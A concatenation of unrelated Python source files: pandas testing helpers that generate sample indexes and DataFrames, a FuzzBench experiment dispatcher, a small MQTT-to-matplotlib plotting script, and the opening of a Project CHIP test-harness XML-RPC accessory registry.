rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.api import (
Float64Index,
Int64Index,
UInt64Index,
)
from pandas.core.arrays import (
DatetimeArray,
PandasArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_NUMPY_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_INT_EA_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_NUMPY_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_INT_EA_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_NUMPY_DTYPES = UNSIGNED_INT_NUMPY_DTYPES + SIGNED_INT_NUMPY_DTYPES
ALL_INT_EA_DTYPES = UNSIGNED_INT_EA_DTYPES + SIGNED_INT_EA_DTYPES
FLOAT_NUMPY_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_NUMPY_DTYPES = FLOAT_NUMPY_DTYPES + ALL_INT_NUMPY_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_NUMPY_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
NP_NAT_OBJECTS = [
cls("NaT", unit)
for cls in [np.datetime64, np.timedelta64]
for unit in [
"Y",
"M",
"W",
"D",
"h",
"m",
"s",
"ms",
"us",
"ns",
"ps",
"fs",
"as",
]
]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index._with_infer(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
"""make a length k index or n categories"""
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
"""make a length k IntervalIndex"""
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeNumericIndex(k=10, name=None, *, dtype):
dtype = pandas_dtype(dtype)
assert isinstance(dtype, np.dtype)
if is_integer_dtype(dtype):
values = np.arange(k, dtype=dtype)
if is_unsigned_integer_dtype(dtype):
values += 2 ** (dtype.itemsize * 8 - 1)
elif is_float_dtype(dtype):
values = np.random.random_sample(k) - np.random.random_sample(1)
values.sort()
values = values * (10 ** np.random.randint(0, 9))
else:
raise NotImplementedError(f"wrong dtype {dtype}")
return NumericIndex(values, dtype=dtype, name=name)
def makeIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="int64")
return Int64Index(base_idx)
def makeUIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="uint64")
return UInt64Index(base_idx)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="float64")
return Float64Index(base_idx)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# Deprecated since version 3.9: collections.Counter now supports []. See PEP 585
# and Generic Alias Type.
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None) # noqa: PDF010
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
dispatcher.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script to run on the dispatcher. Builds each benchmark with each fuzzing
configuration, spawns a runner VM for each benchmark-fuzzer combo, and then
records coverage data received from the runner VMs."""
import datetime
import multiprocessing
import os
import sys
import threading
import time
from typing import List
from common import experiment_path as exp_path
from common import experiment_utils
from common import logs
from common import yaml_utils
from database import models
from database import utils as db_utils
from experiment.build import builder
from experiment.measurer import measure_manager
from experiment import reporter
from experiment import scheduler
from experiment import stop_experiment
LOOP_WAIT_SECONDS = 5 * 60
# TODO(metzman): Convert more uses of os.path.join to exp_path.path.
def _get_config_path():
"""Return config directory."""
return exp_path.path(
experiment_utils.get_internal_experiment_config_relative_path())
def create_work_subdirs(subdirs: List[str]):
"""Create |subdirs| in work directory."""
for subdir in subdirs:
os.mkdir(os.path.join(experiment_utils.get_work_dir(), subdir))
def _initialize_experiment_in_db(experiment_config: dict):
"""Initializes |experiment| in the database by creating the experiment
entity."""
with db_utils.session_scope() as session:
experiment_exists = session.query(models.Experiment).filter(
models.Experiment.name == experiment_config['experiment']).first()
if experiment_exists:
raise Exception('Experiment already exists in database.')
db_utils.add_all([
db_utils.get_or_create(
models.Experiment,
name=experiment_config['experiment'],
git_hash=experiment_config['git_hash'],
private=experiment_config.get('private', True),
experiment_filestore=experiment_config['experiment_filestore'],
description=experiment_config['description']),
])
def _record_experiment_time_ended(experiment_name: str):
"""Record |experiment| end time in the database."""
with db_utils.session_scope() as session:
experiment = session.query(models.Experiment).filter(
models.Experiment.name == experiment_name).one()
experiment.time_ended = datetime.datetime.utcnow()
db_utils.add_all([experiment])
def _initialize_trials_in_db(trials: List[models.Trial]):
"""Initializes entities for each trial in the experiment."""
# TODO(metzman): Consider doing this without sqlalchemy. This can get
# slow with SQLalchemy (it's much worse with add_all).
db_utils.bulk_save(trials)
class Experiment: # pylint: disable=too-many-instance-attributes
"""Class representing an experiment."""
def __init__(self, experiment_config_filepath: str):
self.config = yaml_utils.read(experiment_config_filepath)
self.benchmarks = self.config['benchmarks']
self.fuzzers = self.config['fuzzers']
self.num_trials = self.config['trials']
self.experiment_name = self.config['experiment']
self.git_hash = self.config['git_hash']
self.preemptible = self.config.get('preemptible_runners')
def build_images_for_trials(fuzzers: List[str], benchmarks: List[str],
num_trials: int,
preemptible: bool) -> List[models.Trial]:
"""Builds the images needed to run |experiment| and returns a list of trials
that can be run for experiment. This is the number of trials specified in
experiment times each pair of fuzzer+benchmark that builds successfully."""
# This call will raise an exception if the images can't be built which will
# halt the experiment.
builder.build_base_images()
# Only build fuzzers for benchmarks whose measurers built successfully.
benchmarks = builder.build_all_measurers(benchmarks)
build_successes = builder.build_all_fuzzer_benchmarks(fuzzers, benchmarks)
experiment_name = experiment_utils.get_experiment_name()
trials = []
for fuzzer, benchmark in build_successes:
fuzzer_benchmark_trials = [
models.Trial(fuzzer=fuzzer,
experiment=experiment_name,
benchmark=benchmark,
preemptible=preemptible) for _ in range(num_trials)
]
trials.extend(fuzzer_benchmark_trials)
return trials
def dispatcher_main():
"""Do the experiment and report results."""
logs.info('Starting experiment.')
# Set this here because we get failures if we do it in measurer for some
# reason.
multiprocessing.set_start_method('spawn')
db_utils.initialize()
if experiment_utils.is_local_experiment():
models.Base.metadata.create_all(db_utils.engine)
experiment_config_file_path = _get_config_path()
experiment = Experiment(experiment_config_file_path)
_initialize_experiment_in_db(experiment.config)
trials = build_images_for_trials(experiment.fuzzers, experiment.benchmarks,
experiment.num_trials,
experiment.preemptible)
_initialize_trials_in_db(trials)
create_work_subdirs(['experiment-folders', 'measurement-folders'])
# Start measurer and scheduler in seperate threads/processes.
scheduler_loop_thread = threading.Thread(target=scheduler.schedule_loop,
args=(experiment.config,))
scheduler_loop_thread.start()
measurer_main_process = multiprocessing.Process(
target=measure_manager.measure_main, args=(experiment.config,))
measurer_main_process.start()
is_complete = False
while True:
time.sleep(LOOP_WAIT_SECONDS)
if not scheduler_loop_thread.is_alive():
is_complete = not measurer_main_process.is_alive()
# Generate periodic output reports.
reporter.output_report(experiment.config,
in_progress=not is_complete,
coverage_report=is_complete)
if is_complete:
# Experiment is complete, bail out.
break
scheduler_loop_thread.join()
measurer_main_process.join()
_record_experiment_time_ended(experiment.experiment_name)
logs.info('Experiment ended.')
def main():
"""Do the experiment and report results."""
logs.initialize(default_extras={
'component': 'dispatcher',
})
try:
dispatcher_main()
except Exception as error:
logs.error('Error conducting experiment.')
raise error
experiment_config_file_path = os.path.join(_get_config_path(),
'experiment.yaml')
if experiment_utils.is_local_experiment():
return 0
if stop_experiment.stop_experiment(experiment_utils.get_experiment_name(),
experiment_config_file_path):
return 0
return 1
if __name__ == '__main__':
sys.exit(main())
|
mqtt_plotting.py | # 需要安装 matplotlib
# 参考命令:python3.6 -m pip install matplotlib
# 读取MQTT数据,动态绘制图表
# 代码编写:谢作如,2019.5.8
from pylab import *
import threading
import paho.mqtt.client as mqtt
import time,random
SERVER = "127.0.0.1" #MQTT服务器IP
CLIENT_ID = "79afcb3bdb44b7aa" #在SIoT上,CLIENT_ID可以留空
TOPIC = 'xzr/001' #“topic”为“项目名称/设备名称”
username='siot' #用户名
password='dfrobot' #密码
class MqttClient:
client = mqtt.Client(CLIENT_ID)
def __init__(self, host, port):
self._host = host
self._port = port
self.client.on_connect = self._on_connect
self.client.on_message = self._on_message
def connect(self, username, password):
self.client.username_pw_set(username, password)
self.client.connect(self._host, self._port, 60)
def publish(self, topic, data):
self.client.publish(str(topic), str(data))
def loop(self, timeout=None):
thread = threading.Thread(target=self._loop, args=(timeout,))
# thread.setDaemon(True)
thread.start()
def _loop(self, timeout=None):
if not timeout:
self.client.loop_forever()
else:
self.client.loop(timeout)
def _on_connect(self, client, userdata, flags, rc):
print("\nConnected :" + str(rc))
client.subscribe(TOPIC)
def _on_message(self, client, userdata, msg):
print("\n收到Topic:" + str(msg.topic) + " Message:" + str(int(msg.payload)))
showplt(int(msg.payload)) #开始绘图
def showplt(val):
global x,y,i
grid(True)
plt.ion()
x.append(i)
y.append(val)
ax.plot(x,y,'b')
plt.pause(0.0001)
plt.show()
i +=1
if __name__ == '__main__':
global x,y,i,fig, ax
fig, ax= plt.subplots()
i=0
x=[]
y=[]
showplt(0)
client = MqttClient(SERVER, 1883)
client.connect(username,password)
client.loop()
|
accessories.py | #
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import time
import threading
import sys
from random import randrange
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.client import ServerProxy
IP = '127.0.0.1'
PORT = 9000
if sys.platform == 'linux':
IP = '10.10.10.5'
class AppsRegister:
_instance = None
__accessories = {}
def init(self):
self.__startXMLRPCServer()
def uninit(self):
self.__stopXMLRPCServer()
def add(self, name, accessory):
self.__accessories[name] = accessory
def remove(self, name):
self.__accessories.pop(name)
def removeAll(self):
self.__accessories = {}
def poll(self):
for accessory in self.__accessories.values():
status = accessory.poll()
if status is not None:
return status
return None
def kill(self, name):
accessory = self.__accessories[name]
if accessory:
accessory.kill()
def killAll(self):
for accessory in self.__accessories.values():
accessory.kill()
def start(self, name, discriminator):
